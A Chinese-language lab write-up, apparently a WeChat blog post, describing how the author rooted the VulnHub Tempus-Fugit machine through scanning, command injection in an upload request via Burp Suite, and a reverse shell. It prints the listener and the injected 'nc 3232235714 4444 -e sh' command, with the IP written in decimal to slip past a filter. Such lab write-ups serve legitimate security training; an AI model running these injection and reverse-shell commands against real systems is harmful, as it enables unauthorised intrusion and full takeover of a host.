今天实践的是vulnhub的Tempus-Fugit镜像,过程比较简单,
但都不是常规攻击思路,不看别人的writeup自己搞不定,
下载地址,https://download.vulnhub.com/tempusfugit/Tempus-Fugit.ova,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址192.168.0.195,
其实这步不用地址扫描也行,因为靶机的console上已经显示了地址,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.195,
有web服务,浏览器访问http://192.168.0.195,
发现upload页面,
在上传文件过程中用burpsuite进行劫持,带入命令,
这步是整个靶机攻击过程的关键,想不到就无法继续,
上传文件,
带入whoami命令,
页面回显,当前账户是root,
重新上传文件,带入ls命令,
页面回显,当前目录下有main.py文件,
直接带命令查看main.py内容不行,查看main*有效,
页面回显,
直接带命令点分式的ip地址的反弹shell命令不行,转成十进制的,
kali攻击机上开启反弹shell监听,nc -lvp 4444,
burpsuite劫持带入nc 3232235714 4444 -e sh命令,
获取到反弹shell,id确认是root,
别人的writeup后面还有更多内容,因为到这步就已经拿到root权限了,我就不继续了。
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Tempus-Fugit的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论